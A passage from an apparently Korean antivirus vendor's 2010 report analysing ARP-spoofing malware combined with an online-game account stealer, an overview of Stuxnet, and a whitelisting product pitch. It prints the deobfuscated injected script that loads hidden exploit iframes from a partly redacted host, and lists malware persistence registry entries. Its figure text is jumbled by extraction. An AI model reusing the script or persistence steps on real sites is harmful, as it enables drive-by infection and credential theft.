( 13. IBM X-Force 2010 Mid-Year Trend and Risk Report IBM X-Forece (2010) 10

11 SPECIAL REPORT 최악의악성코드심층분석및대응방안 / 악성코드와의끝없는싸움 ARP Spoofing 몇년사이에많은악성코드들이발견되고있다. 그가운데기억에남는악성코드가있다면아마도 2007, 2008 년까지유행했던 'ARP Spoofing 과결합한 Onlinegamehack' 일것이다. 그당시에도침해사이트와응용프로그램 (Internet Explorer, Flash, PDF 등 ) 의취약성을이용한악성코드유포가빈번하게발생했었는데여기에 "ARP Spoofing" 이라는해킹기법이더해지면서악성코드의빠른확산과고객 ( 특히기업 ) 에상당한피해를입혔다. 한동안잠잠했던 'ARP Spoofing 과결합한 Onlinegamehack' 이올해 9 월초부터침해사이트를통해서다시유포중인것이운영중인 Active Honeypot 에서확인되었다. 보안업체들은수집된변종들을엔진에대응하고있으며, 유포 URL 은국가기관및고객사에공유하여피해예방을해왔다. 하지만지금도많은고객 ( 기업 ) 들에서해당악성코드감염으로인한피해가발생하고있는상황이다. 그래서올해다시이슈가되고있는 'ARP Spoofing 과결합한 Onlinegamehack' 의유포기법그리고악성코드의동작방식에대해정리했다. ARP (Address Resolution Protocol) ARP 란각 PC의 IP에대해서물리주소 (Mac 주소 ) 를매핑시키는프로토콜로, 네트워크에서는 IP기반이아닌 IP에매핑된 Mac 주소를기반으로통신한다. 예를들어 가 과통신을한다고가정했을때 (1) 134 번 IP는통신할 IP가 이라는것은알고있음 (2) 하지만실제로는 IP 통신이아닌해당 IP 에매핑되는 Mac 주소로통신을함 (3) 그런데 134 번은 의 Mac 주소를모름 (4) 따라서 134 번은 의 Mac 주소를찾기위해 Broadcast(FF:FF:FF:FF:FF:FF) 를발생함 (5) 이에대한응답으로 의 Mac 주소는 00:50:56:C0:00:08 로 Reply 함위과정을설명한것이바로아래 [ 그림 2] 이다. Source Destination Protocol Info 정상네트워크 CD Vmware_5d:78:43 Broadcast ARP Who has ? Tell Vmare_c0:00:08 Vmware_5d:78:43 ARP is at 00:50:56:c0:00:08 [ 그림 2] 정상네트워크에서의 ARP 패킷 게이트웨이 IP: Mac: 00-0C E-1B IP: Mac: C ARP Request Broadcast ARP Reply IP: Mac: 00-0C-29-5D IP: Mac: EC-78-2B AB PC A - ARP Table [ 그림 3] 공격자가보낸 ARP Reply 패킷 B EC-78-2B C C E-1B D C [ 그림 1] 정상네트워크의구조 자, 그럼정상네트워크에 ARP Spoofing 이발생했을경우어떻게달 라지는지살펴보자. 11

12 ARP Spoofing 이발생한네트워크 PC C - ARP Table A C FC FC Mac 테이블변조 PC D - ARP Table A C FC FC CD D FC D FC 게이트웨이 IP: Mac: 00-0C E-1B IP: Mac: C ARP Reply 공격자는 ARP Reply 를발생시킴 IP: Mac: 00-0C-29-5D IP: Mac: EC-78-2B IP: Mac: FC AB 공격자 PC A - ARP Table PC B - ARP Table B FC A FC C FC C FC D FC D FC Mac 테이블변조 [ 그림 4] ARP Spoofing 이발생한네트워크 ARP (Address Resolution Protocol) Spoofing 각 PC 의 Mac Table 에매핑된모든 IP 에대한 Mac 주소가공격 자 PC 의 Mac 주소로변조되어모든 PC 들의통신이공격자 PC 를통해서이루어지는기법을의미한다. [ 그림 4] 에서처럼 ARP Spoofing 이발생한네트워크라면공격자는 [ 그림 3] 처럼지속적으 로 ARP Reply 를발생하여동일한네트워크에속해있는다른 PC 들이공격자가보낸 ARP Reply 의정보로자신들의 Mac Table 의 Cache 를업데이트하도록한다. 공격이성공하면각 PC 의 Mac Table 의캐시 (Cache) 는공격자 PC 의 Mac 주소로업데이트되며 이로인해모든트래픽은공격자 PC 를통해서통신하려는각 PC 로 Relay 된다. 결국공격자는자신의 PC 를통과하는모든트래픽 에대해서스니핑 (Sniffing) 이가능하게된다 Sites detected by Active Honeypot 4 Yahoo.js Attacker ww.***.me (CN) 98.***.***.164 (US) ad.htm (MS10-018) news.html (MS10-002) count.html s.exe smx4pnp.dll 10 ma.exe Onlinegamehack xcvaver(%d).dll... ahnzxc.exe anszxc(%d).dll... nvsvc.exe WanPacket.dll Packet.dll wpcap.dll ARP Spoofing 과결합된 Onlinegamehack [ 그림 5] 를참고하여 ARP Spoofing 과결합된 Onlinegamehack 에대해서알아보자. 1. 공격자는불특정웹사이트를대상으로웹공격 (SQL Injection, XSS 등 ) 을수행하여취약한사이트의웹페이지에 yahoo.js 링크삽입 2. 악성코드배포를위한숙주사이트 3 개구축및운영 3. 취약한사이트는웹페이지에삽입된 yahoo.js 에의해서악성코드숙 주사이트와링크 4. 로컬 PC 가취약한 Internet Explorer 를사용하여 yahoo.js 가삽입된사 이트에접속 5. 취약한 Internet Explorer 에의해서접속한사이트에삽입되었던 yahoo.js 링크가실행되면서로컬 PC 에 yahoo.js 가다운로드 & 실행 6. 실행된 yahoo.js 에의해서로컬 PC 에는추가로 ad.htm, news.html, count.html 이다운로드 & 실행 7. ad.htm, news.html 은 Internet Explorer 의취약성을이용하여 s.exe 다 운로드 & 실행하는 Exploit 8. 로컬 PC 에다운로드된 s.exe 가실행되면 smx4pnp.dll 을생성한후실행 9. 실행된 smx4pnp.dll 에의해서로컬 PC 에는추가로 ma.exe, tt.exe 가 다운로드 & 실행 10. ma.exe 는특정온라인게임사용자의계정정보를탈취하는 Onlinegamehack 악성코드 11. tt.exe 는 ARP Spoofing 기능을가진악성코드 [ 그림 6] 은최근한달간 Active Honeypot 에서탐지된정보를근 거로 ARP Spoofing 과결합된 Onlinegamehack 의유포에대해서 타임라인을작성한것이다 [ 그림 5] ARP Spoofing 과결합된 Onlinegamehack 의전체구조 tt.exe 11 12

13 탐지시간유형삽입된 Script URL Download URL 침해사이트 2010/08/26 10:46:32 Downloader Onlinegamehack ***.***.16 외 15 개 2010/08/29 11:13: /09/01 23:43:23 Downloader Onlinegamehack Downloader Onlinegamehack ARP Spoofing ***.*** ***.***.16 외 16 개 2010/09/05 16:09: /09/07 12:49:26 Downloader Onlinegamehack ARP Spoofing Downloader Onlinegamehack ARP Spoofing ***.*** ***.*** 외 9 개 2010/09/11 19:37:40 Downloader Onlinegamehack ARP Spoofing ***.*** /09/13 14:23:59 Downloader Onlinegamehack ARP Spoofing ***.*** 외 8 개 2010/09/14 02:33:58 Downloader Onlinegamehack ARP Spoofing ***.*** /09/15 15:52:13 Downloader Onlinegamehack ARP Spoofing ***.*** 외 6 개 2010/09/19 10:37:54 Downloader Onlinegamehack ARP Spoofing ***.*** ***.*** 외 6 개 [ 그림 6] ARP Spoofing 과결합된 Onlinegamehack 의유포탐지타임라인 [ 그림 6] 에보이는타임라인이전에도다운로더 (Downloader) 만의 유포시도는꾸준히있어왔는데그것은 ARP Spoofing 과결합된 악성코드를유포하기위한테스트정도로파악됐다. 그러나 2010 년 9 월 1 일부터는본격적으로 ARP Spoofing 과결합된악성코드 가침해사이트를통해서유포되기시작했다. 특히수시로삽입 된 Script URL 과 Download URL 의도메인을변경해왔음을알수 가있었다. 악성스크립트 (yahoo.js) 분석 [ 그림 7] 에서보는것처럼 ARP Spoofing 과결합된 Onlinegamehack 감염의시발점이되는 yahoo.js 는침해사이트의 특정페이지에 script src 태그와함께링크형식으로삽입되어있었 으며아래그림처럼난독화된자바스크립트이다. html + = '<param name="swliveconnect" value="true">'; html + = '<embed src="'+src+'"quality=high bgcolor="#ffffff"... html + = '</object>'; document.write(html) }/*SOS*/{document.write('<script src= js><script>');} [ 그림 7] 침해사이트의특정페이지에삽입된 yahoo.js [ 그림 8] 에서보는것처럼 yahoo.js 는 2 단계의난독화된코드로 되어있으며난독화를해독한후의최종스크립트코드는아래 [ 표 1] 과같다. window.onerror=function(){return true;} var Za16da="16a16a"; if(document.cookie.indexof('hello')==-1){ var Za16da="16a16a"; var expires=new Date(); var Za16da="16a16a"; expires.settime(expires.gettime()+24*60*60*1000); var Za16da="16a16a"; document.cookie='hello=yes;path=/;expires='+expires. togmtstring(); var Za16da="16a16a"; document.title=document.title.replace(/\<(\ w \W)*\>/,""); var Za16da="16a16a"; document.write("<iframe src= 일부제거 ] web.com/images/ad.htm width=0 height=0></iframe><iframe src= 일부제거 ]web.com/images/news.html width=0 height=0></iframe>"); var Za16da="16a16a"; document.writeln("<iframe src= 일부제거 ] web.com\/images\/count.html width=0 height=0><\/iframe>"); var Za16da="16a16a"; } [ 표 1] 난독화해독후 yahoo.js 코드 난독화된 ad.htm (MS10-018) 난독화된 news.html (MS10-002) [ 그림 8] 난독화된 yahoo.js [ 그림 9] 난독화된 ad.htm 과 news.html 13

14 [ 표 1] 을보면 yahoo.js 는총 3개의스크립트를추가로다운로드하는데해당스크립트들의역할은 [ 그림 9] 와같다. [ 그림 9] 에서보는것처럼난독화된 ad.htm 과 news.html 은각각 MS10-018, 악성코드숙주사이트 98.***.***.154 (US) MS 취약점을사용하며해당스크립트들이실행되면특정사이트로부터 s.exe 를다운로드및실행한다. MS 취약점을 복호화루틴 s.txt 다운로드 ma.exe, tt.exe 다운로드 이용하는 ad.htm 의 ShellCode 를분석해보면아래복호화루틴에의해서암호화되어있던일부코드를복호화하는데, 위에서언급 복호화 악성코드다운로드 한것처럼특정사이트로부터 s.exe 를다운로드및실행하기위한코드가존재함을알수가있었다. 암호화된 smx4pnp.dll 파일생성 %USERPROFILE%\Microsoft\smx4pnp.dll s.exe 의파일구조 레지스트리등록 [ 그림 10] ShellCode 의복호화루틴 HKCU\Software\Microsoft\Windwos\CurrentVersion\Run smx4pnp = rundll32.exe %USERPROFILE%\Microsoft\smx4pnp.dll, Launch 암호화된 ShellCode 복호화된 ShellCode [ 그림 13] s.exe 의동작구조 [ 그림 11] 암호화, 복호화된 ShellCode 다운로드된 s.exe 는다운로드기능을가진 DLL 을특정경로에생성하는드롭퍼 (Dropper) 이다. s.exe 에대한상세분석은추후언급하기로한다. ad.htm 과 news.html 파일이이용하는취약점에대한상세정보는아래주소를참고한다. MS10-002: MS10-018: 위두취약점을대체하는 MS 보안공지 MS10-035: [ 그림 14] s.exe 의복호화루틴 %USERPROFILE%\Microsoft\smx4pnp.dll 은 CreateThread() 를사 용하여악성코드다운로드기능을실행한다. count.html [ 그림 12] count.html 의기능 count.html 의역할은감염 PC 의현황을파악하기위한스크립트 코드로보여진다. [ 그림 15] CreateThread() : 파일다운로드기능 s.exe 분석 s.exe 는 Onlinegamehack 과 ARP Spoofing 기능을가진악성코드를다운로드하는 DLL 을특정폴더에생성하는드롭퍼 (Dropper) 이며, 전체적인동작구조는 [ 그림 13] 과같다. s.exe 의변종은다수존재하고파일크기는 15kb ~ 50kb 로다양하다. 그리고일부변종에서는 [ 그림 13] 에서보는것처럼생성할 smx4pnp.dll 을암호화된형태로가지고있으며복호화루틴을실행하여 MZ-PE 구조를갖춘 DLL 로복호화한다. [ 그림 16] 파일다운로드 [ 그림 16] 을보면 " %u. %u. %u:81/s.txt" 에서 %u는 gethostbyname() 를사용하여 URL 에대한 IP로설정되며해당 URL 에서 s.txt 를다운로드한다. s.txt 는 Onlinegamehack 과 ARP Spoofing 기능을가진악성코드를다운로드하기위한 URL 리스트가저장된텍스트파일이다. 14

15 Domain Full URL Country Detection Time 비고 ku****.in CN 2010/09/03 12:18:43 98.***.***.154 로 변경됨 US 2010/09/07 12:49: US 2010/09/10 11:49:26 ****.net.in US 2010/09/15 15:52:13 ****.nt.in US 2010/09/19 10:37:54 ****.net.in 98.***.***.155 로 변경됨 [그림 17] 악성코드 유포 URL의 타임라인 [그림 17]은 smx4pnp.dll이 s.txt, ma.exe, tt.exe를 다운로드할 때 DLL을 분석해 보면 탈취한 계정정보를 전송하는데 사용되는 URL 사용했던 URL들에 대한 타임라인을 정리한 것으로 도메인은 수 은 암호화된 상태이며 아래 복호화 루틴에 의해서 복호화된다. 시로 변경됨을 알 수가 있고 현재까지 악성코드를 유포 중인 IP대 역은 *6.***, *0.*** 등이며 해당 대역의 IP정보를 조 ma.exe 회해 보면 미국에 할당된 IP대역인 것으로 확인된다. 그리고 해당 도메인들에 대한 whois를 조회해 본 결과 모두 최근에 생성된 것 으로 판단된다. HKCU\Software\Microsoft\Windwos\CurrentVersion\Run anhxox = %SYSTEM%ahnzxc.exe ahnzxc.exe 복사본 *****story.exe li**.bin, ai**.bin... 유출대상 게임과 사이트 특정 온라인 게임 계정 정보 유출 anszxc%d.dll 특정 사이트로 전송 유출된 계정정보 수집 사이트 특정 온라인 게임 계정 정보 유출 anszxc%d.dll BHO 파일생성 *****story.exe li**.bin, ai**.bin... IEHlprObj.IEHlprObj 1 =... [그림 18] WHOIS Query Result [그림 21] ma.exe의 동작구조 [그림 22] URL 복호화 루틴 [그림 19] DNS Query Result [그림 23] 암호화된 URL 복호화 전과 후 [그림 20] 악성코드 유포에 사용 중인 추가 IP ma.exe(onlinegamehack) 분석 ma.exe는 특정 온라인 게임 사용자의 계정정보를 탈취할 목적을 가진 악성코드로 동작구조는 [그림 21]과 같다. ma.exe가 실행된 후 생성한 2개의 DLL은 [그림 21]에서 보는 것처럼 특정 게임 또 는 게임 사이트 로그인 시 사용되는 사용자의 계정정보를 탈취 하여 특정 URL로 전송하는데 [그림 21]의 파일생성에서 첫 번째 [그림 24] 테스트 시 계정정보 유출패킷 15 유출대상 게임과 사이트

16 파일명 URL IP 유출대상유출여부비고도메인정보 anszxc10.dll anszxc20.dll 98.***.***.92 (US) wo***.exe dn***.exe No pco***.exe No *****story.exe No ****ol.exe ****in.bin play****.co.kr ****on.play****.jp ****on.bin play****.co.kr ****game.com id.****game.com No No No No Yes ( 테스트확인 ) Yes ( 테스트확인 ) 코드분석으로확인 df.****.on.com ( 증상재현안됨 ) ***.on.play.****.jp ( 접속불가 ) Domain Name:k****.CO.IN Created On:13-Sep :27:13 UTC Expiration Date:13-Sep :27:13 UTC Registrant ID:TS_ Registrant Name:liu xiaowei Registrant Organizationjiuxiaowei Registrant Street:1:!huang helu 28 Hao Registrant City:zhe jiang Registrant State/Province:jiaxing Registrant Postal Code: Registrant Country:CN Registrant Phone: Registrant FAX: Registrant Emai:****ing886@gmail.com [ 그림 25] Onlinegamehack 의계정정보유출현황 파일생성 tt.exe [ 그림 21] 에서 ma.exe 가실행되면두개의 DLL 을생성함을알수 있었으며, [ 그림 25] 에서는해당두 DLL 들이다수의온라인게임 을대상으로사용자의계정정보유출시도함을알수가있다. nvsvc.com Packet.dll HKCU\Software\Microsoft\Windwos\CurrentVersion\Run nvsvc= %SYSTEM%\nvsvc.exe CreateThread() Call Thread 1 감염 PC 의네트워크대역으로 ARP Request Broadcast 감염 PC 의 ARP Table Static 설정 tt.exe(arp Spoofing) 분석 [ 그림 27] 을보면정상 PC의 ARP Table 에설정된 G/W( 게이트웨이 ) 의 Mac 주소가악성코드에감염된 PC의 Mac 주소로변경되어있음을알수가있다. 이렇게되면 4번 IP에서 In/Out 되는모든패킷이악성코드에감염된 PC를통해서 Relay 되므로스니핑 (Sniffing) 이가능해진다. WanPacket.dll Thread 2 감염 PC 의네트워크대역으로 ARP Reply 패킷전송 정상파일 wpcap.dll npf.sys 패킷전달 Packet Relay 스크립트삽입 <script src= [ 그림 29] 재조립되어 4 번 IP 에 Relay 된패킷일부 [ 그림 26] tt.exe 의동작구조 악성코드에감염된 PC 의 IP 정보 Physical Address : 00-0C FC Dhcp Enabled : No IP Address : Subnet Mask : Default Gateway : DNS Servers : > 악성코드에감염된 PC의 ARP Table Internet Address Physical Address Type f-cb-fd-5c-9b static G/W 의정상 IP/Mac 주소 static c-29-f6-d4-13 static c b-9c static [ 그림 30] 재조립된패킷에삽입된악성스크립트링크 [ 그림 31] yahoo.js 가특정사이트에추가로다운로드하는파일들 > 정상 PC의변조된 ARP Table Internet Address Physical Address Type G/W 의변조된 IP/Mac 주소 f-cb-fd-5c-9b dynamic dynamic c fc dynamic 악성코드에감염된 IP/Mac 주소 c b-9c dynamic [ 그림 27] ARP Table 비교 [ 그림 32] 악성코드에감염된 PC에서발생한 ARP Request Broadcase 이번이슈를정리하는동안개인보다는기업에서피해사례가더많았다는것과 PC가집단네트워크를이루고있는환경을대상으로했다는것을알수가있었다. 이악성코드가 IE 보안취약점을이용한만큼보안업데이트에좀더신경썼다면 PC와네트워크모두안전했을것이다. [ 그림 28] 악성코드에감염된 PC 에서발생한 ARP Reply 16

17 SPECIAL REPORT 최악의악성코드심층분석및대응방안 / 악성코드의새로운패러다임 Stuxnet 스턱스넷 (Stuxnet) 스턱스넷 (Stuxnet) 은보안위협의패러다임을바꾸는차원이다른악성코드이다. 지금까지등장한악성코드가자기과시나금전적인이득을목적으로한것과달리스턱스넷은단지핵심시설의파괴만을목표로하고있다. 이로인해스턱스넷은악성코드가사이버무기화된첫번째사례로주목받고있는것이다. 또한현존하는악성코드가운데가장정교한것으로도평가받고있다. 스턱스넷 (Stuxnet) 은폐쇄망으로운용되는대규모산업시설을겨냥해제작된악성코드로서, 특정산업자동화시스템만을공격목표로제작된프로그램이다. 이악성코드는원자력, 전기, 철강, 반도체, 화학등주요산업기반시설의제어시스템에오작동을유발함으로써시스템마비및파괴등의치명적인손상을입힐수있다. 실제로이란부셰르원자력핵발전소와중국 1천여개주요산업시설을비롯해전세계여러국가에감염이확산된것으로알려지고있다. 스턱스넷공격동향 1. 이란의핵시설에스턱스넷공격 (2010 년 1월 ~ 9월 ) 부셰르원전핵발전소운영시스템과운영자 PC에스턱스넷침투나탄즈우라늄농축시설스턱스넷감염으로수차례오작동유발 2. 중국내주요산업기반시설에스턱스넷공격 (2010 년 7월 ~ ) 중국 600 만 PC 가스턱스넷에감염, 주요산업시설공격 (1 천여개 ) 중국의철강, 전력, 원자력등주요산업시설스턱스넷공격피해조사중 3. 미국, 인도네시아, 인도, 파키스탄에서도스턱스넷발견이악성코드는 C&C(Command & Control) 서버를통해 SCADA 시스템의 PLCs(programmable logic controllers) 를제어하기위한프로그램명령어를받아와서임의로변경함으로써악성코드제작자가원하는동작을수행하는것을가능하게한다. 이악성코드에영향을받는환경은다음과같다. 1. SCADA 시스템에지멘스 (Siemens) 의 WinCC/Step7 통합관리도구가설치되어있어야함 2. PLC 타입이 6ES 또는 6ES7-417 인경우 3. Windows OS 기반의시스템이처럼스턱스넷의동작조건이한정적이기때문에일반사용자들의 PC가감염되더라도크게위협이되지는않는다. 그러나관련업계에종사하는사용자가악성코드에감염된 PC에서감염된 USB 를 SCADA 시스템을운영하는시스템과동일한네트워크의 PC에삽입하는경우에감염될수있으므로주의가필요하다. 스턱스넷감염프로세스안철수연구소시큐리티대응센터의분석에따르면 ' 스턱스넷 ' 은여러개의파일로구성되며, 알려지지않은여러개의취약점을이용해서산업자동화제어시스템을제어하는 PC에드롭퍼 (Dropper, 스턱스넷의핵심모듈파일을생성하는하는파일 ) 가실행된다. 이드롭퍼는정상 s7otbxdx.dll 파일의이름을변경해백업하고정상 s7otbxdx.dll 파일과동일한이름으로자신의파일을생성한다. 이후산업자동화제어시스템을통합관리하는도구인 Step7 을실행하면원래의정상파일이아닌스턱스넷이실행된다. 'Step7' 의기능은 s7otbxdx.dll 파일을통해서제어 PC와산업자동화제어시스템간에블록파일을교환하는것이다. 이파일을스턱스넷의 DLL 파일로바꾸면산업자동화제어시스템을모니터링하거나제어 ( 수정또는악성블록생성 ) 할수있다. 이후공격자는모터, 컨베이어벨트, 펌프등의장비를제어하거나심지어폭발시킬수도있다. 즉, 산업시설이관리자가아닌악의적공격자에게장악될수있는것이다. 스턱스넷의공격과정은 [ 그림 1] 을통해자세히살펴보자. 17

18 5 공격명령생성 Attacker C&C 서버 2 감염시스템정보전송 6 공격명령전송 index.php?data=66a54e2 7 관리자의 PLC 제어명령생성 8 PLC 제어명령변조 9 Target 공격 10 산업장비감염설비제어장애발생 1 USB 를통한감염 개인 PC 스턱스넷에감염된 PC WinCC/STEP7 PLC 제어 PC 3 내부네트워크감염 Zero Day Attack 공유폴더, 오토런 MS08-064, 046, 공격명령 Share RPC 서버통신 내부시스템 [ 그림 1] 스턱스넷악성코드감염개념도 1. 스턱스넷에감염된 PC에서 USB 를통해 PLC 를제어하는메인 PC에스턱스넷전파스턱스넷은메인악성코드설치를위해 ~WTR4141.tmp 파일과 ~WTR4132.tmp 2개의파일을사용하고최초악성코드실행을위해 Autorun.inf 와 MS 취약점을공격하는.lnk 파일을이용한다. 2. 감염된 PC에서 C&C 서버로감염시스템정보전송 IExplorer.exe 프로세스에인젝션 (Injection) 되어 C&C 서버와통신감염 PC의 OS버전, 감염시간, IP정보, 감염된 Project 파일등정보를 C&C 서버에전송 C&C 서버의명령에따라감염된다른시스템들의버전업데이트를위한 RPC 서버로동작 3. 악성코드유포를위해내부네트워크의타시스템공격 WINCC database 를이용한감염, 네트워크공유를이용한감염, MS 프린터스풀러보안취약점을이용한감염, MS 및 MS 취약점을이용한감염등의방법으로네트워크내의다른시스템을감염시킨다. 4. 감염된메인 PC와추가감염된내부시스템간의공격명령공유악성코드감염시 RPC 서버가동작하여네트워크상의다른감염된클라이언트로부터감염된버전체크를위한통신을수행하고버전이낮은경우상위버전의악성코드를받아설치한다. 5. 악성코드제작자의공격명령생성악성코드제작자는임의의공격명령의생성해 C&C 서버에전송한다. 6. 공력명령전송 C&C 서버는악성코드제작자가제작한암호화된바이너리코드를받아와실행한다. 7. 관리자의 PLC 제어명령생성 PLC 장치를제어하기위한 Step7 프로그램은 STL 이나 SCL 과같은언어로제작된데이터와코드의 Block 들을 MC7 형태의파일로컴파일해서 PLC 장치에전송해주고 PLC 장치는이 Block 들을받아메모리에저장한후로드하여동작한다. s7otbxdx.dll 파일은 PLC 장비와관리프로그램간의데이터교환을해주는기능을가진파일이다. 스턱스넷악성코드에감염된경우악성코드는원래프로그램에서동작하고있는정상 dll 파일을 s7otbxsx.dll 파일로이름을변경한후악성코드제작자가임으로제작한악의적인 dll 파일을동일한파일명으로생성한다. dll 파일이변경됨으로인해다음과같은행위가가능하게된다. 1) Step7 프로그램과 PLC 장비간에교환되는 PLC Block 들에대한모니터링을할수있다. 2) 관리자가생성한데이터 Block 들에공격자가의도하는명령어가들어있는 Block 을삽입하거나 Block 을교체함으로써 PLC 장치가공격자의의도대로동작하게한다. 3) 감염된 PLC 장치의정보를확인할수있다. 9. 타깃 (Target) 공격이렇게변조된명령어를통해악성코드제작자가의도한타깃에대한공격을시도한다. 10. 산업장비감염 - 설비제어장애발생악성코드제작자는자신의의도에따라모터, 컨베이어벨트, 펌등의장비를제어하거나마비등의장애를일으킬수있다. RPC Client 1 악성코드버전체크 2 감염버전정보전송 RPC Server 3 로컬 PC의버전비교 4 상위버전악성코드요청 5 악성코드전송 6 최신악성코드설치 [ 그림 2] RPC 서버를이용한최신버전의악성코드공유프로세스 STEP7 PLC 장치 8. PLC 제어명령변조 CodeBlock AddBlock Code Block 요청 스턱스넷악성코드가의도하는것은 PLC 장치에공격자가의도한명령어 를삽입하는것이다. 이를위해공격자는특정버전의 Step7 프로그램에 서사용하는 s7otbxdx.dll 파일을공격자가임의로제작한것으로교체한다. 변경된 DLL 변조된 Code Block S7otbxdx.dll 원본 DLL S7otbxsx.dll Code Block 전송 [ 그림 3] 악성 s7otbxdx.dll 을이용한 PLC 의 Code Block 변조 Code Block 18

19 스턱스넷감염예방을위한일반적인조치사항스턱스넷은기존악성코드와는다른패턴을보여주고있다. 하지만감염과유포방식에있어서는 USB 라는이동형저장장치와윈도우 OS의취약점을이용하고있다. 이부분에초점을맞춰기업보안담당자가취할수있는예방방법은다음과같다. 스턱스넷 컨피거웜 신종악성코드 USB 실행 IP/Port 실행 허가되지않은프로그램실행 1. 최신버전으로업데이트된백신소프트웨어사용 스턱스넷악성코드의확산도가 7 월이후전세계적으로점점증 가하고있는추세이고변형또한많이발견되고있는상황이므로 최신버전의백신프로그램을사용해서감염을예방해야한다. 2. USB 자동실행방지 대부분의 SCADA 시스템은폐쇄망에서운영되므로실제감염 이발생하는경로로이용될수있는것은 USB 일가능성이높다. 따라서폐쇄망에서사용되는시스템의경우 V3 의 CD/USB 자동 실행방지옵션을활성화하여감염을예방한다. 3. 최신보안패치적용 사내시스템이윈도우 OS 의취약점을이용한공격에의해감염 되는것을예방하기위해최신보안패치를업데이트하는것이 중요하다 1) Microsoft 보안공지 MS 긴급 Windows 쉘의취약점으로인한원격코드실행문제점 ( ) 2) Microsoft 보안공지 MS 긴급 인쇄스풀러서비스의취약점으로인한원격코드실행문제점 ( ) 3) Microsoft 보안공지 MS 긴급 서버서비스의취약점으로인한원격코드실행문제점 (958644) 4) Privilege escalation via Keyboard layout file 패치미제공 5) Privilege escalation via Task Scheduler - 패치미제공 4. 공유폴더사용주의 불필요한공유폴더생성은금지하고생성한공유폴더에는접 근이필요한사용자계정에게만읽기권한주도록하되함부로 쓰기권한은주지않도록한다. 스턱스넷감염예방을위한제언산업용시스템전용보안솔루션 AhnLab TrusLine 앞서언급했듯이스턱스넷은기존의악성코드와는완전히다른 목적성을띠고있다. 일반적인악성코드가유포나확산을목적으 로하는반면, 스턱스넷은정확한타깃을노려제작되었다. 따라 서악성코드샘플수가적기때문에수집자체에어려움을겪을 수밖에없다. 또한샘플이수집되었더라도특정시스템에서만 동작하므로악성코드여부를확인할수있는테스트실시도쉽지 않은일이다. 스턱스넷뿐만아니라최근발생하고있는악성코드 [ 그림 4] AhnLab TrusLine 개요 들은날로새로운기법으로무장하고있어전통적인블랙리스트 기반의안티바이러스솔루션으로방어하기엔역부족인상황이다. 특히, 악성코드침해로인해운영상의장애가발생할경우엄청 난피해로이어지는산업용시스템의경우에는안정성확보를위 한새로운컨셉의보안솔루션도입이반드시필요하다. 안철수 연구소가지난 9 월출시한 AhnLab TrusLine( 안랩트러스라인, 이 하트러스라인 ) 은산업용시스템환경에적합한최적의보안솔 루션이다. 트러스라인은허용된프로그램만실행가능하게하는 화이트리스트기반의보안솔루션으로, 불필요한프로그램작동 이나악성코드침입등으로시스템의작동에차질이생기지않도 록해주는제품이다. 트러스라인의특징은다음과같다. 처리방식 프로그램제어 편의성 엔진사이즈 리소스점유율 보안수준 업데이트 / 패치 [ 그림 5] White List vs Black List 비교 AhnLab TrusLine White List 기반의 TrusLine 사전예방 허용된 Application 만사용 제한적환경 변경없음 낮음 높음 업데이트가필요한경우정기적인라인점검시스케쥴링가능 화이트리스트 (White List) 기반의보안솔루션 트러스라인에적용한화이트리스트방식은현존악성코드는물 론미발견변종 / 신종악성코드까지막을수있다. 기존백신제 품은엔진에포함된악성코드시그니처를기반으로악성코드유 무를판단하기때문에사후처리만가능하다. 반면, 트러스라인 은허용된프로그램만실행하게함으로써현존악성코드뿐아니 라향후발생할변종및신종악성코드까지원천적으로막을수 있다. 즉, 애플리케이션제어, 비허가실행코드차단, USB 등매 체제어, IP/Port 차단등과같은기능을갖추고있기때문에스턱 스넷과같은악성코드가실행조차되지않는환경을만들어주는 것이다. 트러스라인은기존일반적인화이트리스트방식의제품 과도다른차별점을지니고있다. 즉, 다른제품은각클라이언트 PC 에설치된파일의안전여부를 PC 용백신으로검증하는데반 해트러스라인은관리서버에서검증한다. 따라서클라이언트 PC 용백신을추가로설치하지않아도된다. Black List 기반의 Anti-Virus 사후처리 모든 Application 사용가능 범용적환경 지속적인증가 높음 낮음 실시간업데이트 / 패치적용으로장애발생우려 19

20 실행파일 IP/Port 차단 Lock Engine 정책설정 관리 Console 지정된프로그램만설치및사용 실행파일 IP/Port 차단 Lock Engine [ 그림 6] AhnLab TrusLine 구성도 Signature Update 악성코드분석 악성코드의감염및신종악성코드에대한예방 Internet USB 자동실행방지 트러스라인이적용되어 Locking 된시스템은화이트리스트를기반 으로운용되기때문에이리스트에존재할수없는악성코드의실 행이차단된다. USB 메모리를통한오토런 (autorun) 의실행과감염, 포트를통하여전파되는웜등의실행자체가불가능해지며, 신종 악성코드도리스트에등록될수없기때문에감염이될수없다. 악성코드침입루트를차단하기위한 IP & Port 차단기능트러스라인은실행프로그램의제어만으로는해결하기힘든악성코드의침입에대비하기위해산업용시스템에설치된프로그램이사용하는 IP와 Port 만오픈함으로써보다완벽한보안환경을구축할수있다. 특히기존에백신프로그램과함께설치되었던 Personal Firewall 이범용적환경지원을위해다양한기능을추가함으로써발생했던리소스점유율을최소화함으로써저사양의산업용프로그램에서도안정적으로사용할수있는기능을제공하고있다. 시스템관리정책의자연스러운적용사용자들에게 USB 메모리나공유폴더사용을금지해도 100% 막을수없다. 하지만트러스라인은불필요한프로그램실행을차단하므로위험의수준을낮추고관리의편의성을자연스럽게확보할수있다. 스턱스넷과같은악성코드의최종목표는타깃대상인산업용시스템에치명적인타격을입히는것이다. 이는악성코드가전략적으로이용될가능성이있음을보여주는구체적인사례이며, 앞으로도이같은공격은더욱늘어날것으로예상된다. 이에대응하기위해서는트러스라인과같은화이트리스트기반의전용솔루션으로대비하는방안이필요하다. 20

